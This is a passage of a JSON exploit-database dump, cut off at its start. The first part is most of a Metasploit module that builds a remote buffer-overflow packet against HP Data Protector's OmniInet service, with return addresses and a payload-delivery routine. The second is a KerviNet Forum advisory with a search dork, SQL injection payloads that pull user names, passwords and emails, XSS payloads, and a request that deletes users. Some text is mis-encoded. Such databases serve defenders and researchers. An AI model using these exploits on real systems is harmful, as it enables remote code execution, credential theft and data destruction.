INET, internal build 330',\n {\n 'Ret' => 0x004406cf # p/p/r - OmniInet.exe (v5.50.330.0)\n }\n ],\n [ 'HP OpenView Storage Data Protector A.06.00: INET, internal build 331',\n {\n 'Ret' => 0x0044327d # p/p/r - OmniInet.exe (v6.0.331.0)\n }\n ],\n\n # APPRM Targets\n [ 'HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81',\n {\n 'Ret' => 0x004280ff # p/p/r - OmniInet.exe (v6.0.81.0)\n }\n ],\n [ 'HP Application Recovery Manager software A.06.10: INET, internal build 282',\n {\n 'Ret' => 0x004412ed # p/p/r - OmniInet.exe (v6.0.282.0)\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 17 2009'))\n\n register_options([Opt::RPORT(5555)])\n end\n\n def check\n connect\n sock.put(rand_text_alpha_upper(64))\n resp = sock.get_once(-1,5)\n disconnect\n\n if (resp)\n resp = resp.unpack('v*').pack('C*')\n print_status(\"Received response: \" + resp)\n\n # extract version\n if (resp =~ /HP Data Protector/)\n version = resp.split[3]\n elsif (resp =~ /HP OpenView Storage Data Protector/)\n version = resp.split[5]\n elsif (resp =~ /HP StorageWorks Application Recovery Manager/)\n version = resp.split[5]\n else\n return Exploit::CheckCode::Detected\n end\n\n version = version.split('.')\n major = version[1].to_i\n minor = version[2].to_i\n if ((major < 6) or (major == 6 and minor < 11))\n return Exploit::CheckCode::Appears\n end\n\n if ((major > 6) or (major == 6 and minor >= 11))\n return Exploit::CheckCode::Safe\n end\n\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n mytarget = target\n\n if (target['auto'])\n mytarget = nil\n\n print_status(\"Automatically detecting the target...\")\n\n connect\n sock.put(rand_text_alpha_upper(64))\n resp = sock.get_once(-1,5)\n disconnect\n\n if not resp\n fail_with(Failure::Unknown, \"No version response returned.\")\n end\n\n resp = resp.unpack('v*').pack('C*')\n print_status(\"Received response: \" + resp)\n\n self.targets.each do |t|\n if (resp =~ /#{t.name}/) then\n mytarget = t\n break\n end\n end\n\n if (not mytarget)\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n else\n print_status(\"Trying target #{mytarget.name}...\")\n end\n\n # separator between arguments\n sep = [0x2000].pack('N')\n\n # Unicode BOM\n pkt = \"\\xff\\xfe\"\n # MSG_PROTOCOL command\n pkt << Rex::Text.to_unicode(\"267\")\n\n # dunno\n 3.times do\n pkt << sep\n pkt << rand_text_alpha_upper(2)\n end\n\n # culprit string\n pkt << sep\n\n # the payload + seh record\n pkt << payload.encoded\n pkt << generate_seh_record(mytarget.ret)\n\n # jump back\n dist = payload_space + 8\n pkt << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + dist.to_s).encode_string\n\n # force exception hitting the end of the stack\n pkt << rand_text_alphanumeric(1000) * 25\n\n # 5th arg\n pkt << sep\n pkt << rand_text_alpha_upper(2)\n\n # end marker\n pkt << sep\n\n # packet length\n buff = [pkt.length].pack('N')\n buff << pkt\n\n connect\n print_status(\"Sending MSG_PROTOCOL packet...\")\n sock.put(buff)\n\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_omniinet_1.rb"}], "zdt": [{"lastseen": "2018-01-01T13:01:27", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-07-01T00:00:00", "published": "2009-07-01T00:00:00", "id": "1337DAY-ID-5448", "href": "https://0day.today/exploit/description/5448", "type": "zdt", "title": "KerviNet Forum <= 1.1 Multiple Remote Vulnerabilities", "sourceData": "=====================================================\r\nKerviNet Forum <= 1.1 Multiple Remote Vulnerabilities\r\n=====================================================\r\n\r\n\r\ndork: \"Copyright KerviNet\"\r\neLwaux(c) 20.06.2009\r\n\r\n## ## ## ##\r\nBlind SQLinj\r\n/index.php\r\n-------------------------------------------------------------------------------------------------\r\nif($_COOKIE['user_enter']==\"auto\") {\r\n$enter_login=$_COOKIE['enter_login'];\r\n$enter_parol=$_COOKIE['enter_parol'];\r\n$mysql->query(\"SELECT name, pass, status FROM users WHERE name =\r\n'\".$enter_login.\"' AND pass = '\".$enter_parol.\"'\");\r\n-------------------------------------------------------------------------------------------------\r\nexploit:\r\n COOKIE: user_enter=auto\r\n COOKIE: enter_login = abc\r\n COOKIE: enter_parol = ' or name = (select name from users where\r\nid_user=1) and '1'='1';\r\n sqlQuery: SELECT name, pass, status FROM users WHERE name = 'abc'\r\nAND pass = '' or name = (select name from users where id_user<10 limit\r\n1)\r\n\u00d0\u00b8 \u00d0\u00b2\u00d1\u2039 \u00d0\u00b0\u00d0\u00b2\u00d1\u201a\u00d0\u00be\u00d0\u00bc\u00d0\u00b0\u00d1\u201a\u00d0\u00be\u00d0\u00bc \u00d0\u00b7\u00d0\u00b0\u00d0\u00b9\u00d0\u00b4\u00d0\u00b5\u00d1\u201a\u00d0\u00b5 \u00d0\u00bf\u00d0\u00be\u00d0\u00b4 \u00d0\u00b0\u00d0\u00b4\u00d0\u00bc\u00d0\u00b8\u00d0\u00bd\u00d0\u00be\u00d0\u00bc, \u00d0\u00b4\u00d0\u00b0\u00d0\u00b6\u00d0\u00b5 \u00d0\u00bd\u00d0\u00b5 \u00d0\u00b7\u00d0\u00bd\u00d0\u00b0\u00d1\u008f \u00d0\u00b5\u00d0\u00b3\u00d0\u00be \u00d0\u00b8\u00d0\u00bc\u00d0\u00b5\u00d0\u00bd\u00d0\u00b8 (:\r\n\r\n\r\n\r\n## ## ## ##\r\nSQLinj\r\n/message.php\r\n-------------------------------------------------------------------------------------------------\r\n9: $topic=$_GET['topic'];\r\n18: if($topic) {\r\n69: $mysql->query(\"SELECT name, viewing, voting, status, top_status,\r\nid_forum FROM topics WHERE id_topic = \".$topic);\r\nexploit:/message.php?topic=-1+union+select+1,concat_ws(0x3a,id_user,name,pass,email),3,4,5,6+from+users\r\n-------------------------------------------------------------------------------------------------\r\n\r\n\r\n## ## ## ##\r\nSiXSS\r\n/message.php\r\nexploit:/message.php?topic=-1+union+select+1,'{XSS}',3,4,5,6+from+users\r\n\r\n\r\n## ## ## ##\r\naXSS\r\n/add_voting.php\r\n-------------------------------------------------------------------------------------------------\r\n22: $topic=$_GET['topic'];\r\n61: if($topic) {\r\n66: \t $forum_edit->add_voting($time, $topic, $v_vopros, $variants);\r\n74: }\r\n\r\nfunction add_voting($time, $topic, $v_vopros, $variants) {\r\nglobal $user;\r\nglobal $user_ip;\r\nif($user) {\r\nglobal $mysql;\r\n$mysql->query(\"UPDATE topics SET voting = 1 WHERE id_topic = \".$topic);\r\n$mysql->query(\"INSERT INTO v_name VALUES (0, '\".$v_vopros.\"', \".$topic.\")\");\r\n$id_vname=mysql_insert_id();\r\nfor($i=0; $i<count($variants); $i+=1) {\r\n$vr_nom=$i+1;\r\n$mysql->query(\"INSERT INTO v_variants VALUES (\".$vr_nom.\",\r\n'\".$variants[$i].\"', \".$id_vname.\")\");\r\n}\r\n}\r\nreturn $id_vname;\r\n}\r\n-------------------------------------------------------------------------------------------------\r\n\r\nexploit:/add_voting.php?topic=1\r\n POST: add_voting = ok_add\r\n POST: v_vopros = v\r\n POST: v_variant1 = {XSS}\r\n POST: v_variant2 = v2\r\n\r\n\r\n## ## ## ##\r\nusers deleating\r\n/admin/edit_user.php\r\n-------------------------------------------------------------------------------------------------\r\n$del_user_id=$_POST['del_user_id'];\r\n$mysql->query(\"DELETE FROM users WHERE id_user = \".$del_user_id);\r\n-------------------------------------------------------------------------------------------------\r\nexploit:\r\n POST: del_user_id=(select user_id from users limit 1)\r\n\r\n\r\n## ## ## ##\r\nPath Disclosure\r\n-------------------------------------------------------------------------------------------------\r\n/include_files/voting_diagram.php\r\n/include_files/voting.php\r\n/include_files/topics_search.php\r\n/include_files/topics_list.php\r\n/include_files/top_part.php\r\n/include_files/quick_search.php\r\n/include_files/quick_reply.php\r\n/include_files/moder_menu.php\r\n/include_files/messages_list.php\r\n/include_files/menu.php\r\n/include_files/head.php\r\n/include_files/forums_list.php\r\n/include_files/forum_statistics.php\r\n/include_files/forum_info.php\r\n/include_files/birthday.php\r\n/admin/head.php\r\n-------------------------------------------------------------------------------------------------\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5448"}]}
